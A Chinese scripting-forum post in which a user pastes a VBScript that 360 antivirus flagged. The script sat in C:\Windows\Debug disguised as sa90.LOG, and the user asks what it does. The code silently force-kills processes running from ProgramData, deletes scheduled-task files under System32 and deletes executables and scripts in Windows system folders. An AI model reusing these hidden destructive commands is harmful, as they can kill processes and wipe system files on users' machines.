批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程
[批处理文件精品]批处理版照片整理器[批处理文件精品]纯批处理备份&还原驱动在线第三方下载
返回列表 发帖

[其他] 我登陆京东的时候360提示有可疑进程准备运行,sa90.LOG,是个vbs

本帖最后由 再世情緣 于 2020-1-12 16:31 编辑
  1. DIM objShell
  2. set objShell=wscript.createObject("wscript.shell")
  3. strComputer = "."
  4. Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
  5. Set colItems = objWMIService.ExecQuery( _
  6.     "SELECT * FROM Win32_Process where CommandLine like ""%ProgramData%""",,48)
  7. For Each objItem in colItems
  8. a=Split(objItem.CommandLine,"\")
  9. 'Wscript.Echo UBound(a)
  10. if UBound(a)=3 then
  11. processName = replace(a(3),"""","")
  12. Wscript.Echo processName
  13. if  instr(a(3),right(a(2),len(a(2))-1)) then
  14. cmd = "taskkill.exe /F /IM " &processName
  15. Wscript.Echo cmd
  16. cmd2 = "cmd.exe /c del /F /Q "&objItem.CommandLine
  17. Wscript.Echo objItem.CommandLine
  18. iReturn=objShell.Run(cmd, 0, TRUE)
  19. iReturn=objShell.Run(cmd2, 0, TRUE)
  20. end if
  21. end if
  22. Next
  23. Dim Fso,MyFolder,Folders
  24. Set Fso = CreateObject ("Scripting.FileSystemObject")
  25. Set MyFolder = Fso.GetFolder("C:\Windows\System32\Tasks\Microsoft\Windows")
  26. Set Folders = MyFolder.SubFolders
  27. For Each Folder in Folders
  28.     if InStr(Folder.name,"-")>0 then
  29. 'Wscript.Echo "C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name
  30. cmd= "cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name&"\*"
  31. iReturn=objShell.Run(cmd, 0, TRUE)
  32. end if
  33. Next
  34. 'Set ws=WScript.CreateObject("wscript.shell")
  35. 'w="C:\Windows\System32\Tasks\Microsoft\Windows"
  36. 'Set fso=WScript.CreateObject("scripting.filesystemobject")
  37. 'Set fs=fso.GetFolder(w)
  38. 'Set f=fs.SubFolders
  39. 'For Each uu In f
  40. ' if instr(uu.Path,"-") then
  41. ' cmd3 = "cmd.exe /c del /F /Q "&uu.Path&vbCrLf
  42. ' iReturn=objShell.Run(cmd3, 0, TRUE)
  43. ' end if
  44. 'Next
  45. iReturn=objShell.Run("taskkill.exe /F /IM CmdRun*", 0, TRUE)
  46. iReturn=objShell.Run("taskkill.exe /F /IM RCDLL*", 0, TRUE)
  47. iReturn=objShell.Run("taskkill.exe /F /IM regcap*", 0, TRUE)
  48. iReturn=objShell.Run("cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\Provisioning\*", 0, TRUE)
  49. iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\Time Trigger Test Task""", 0, TRUE)
  50. iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\programdata*""", 0, TRUE)
  51. iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\Media\*.exe", 0, TRUE)
  52. iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\AppPatch\*.vbs", 0, TRUE)
  53. Set objShell=NoThing
复制代码
我登陆京东的时候,360弹出来的,是否要拦截,我点了拦截,路径是 C:\Windows\Debug\sa90.LOG,我找到文件,用notepad打开之后是这段代码
这段代码是啥意思啊

最后一段是结束进程删除文件的,我知道,前面的看不懂

返回列表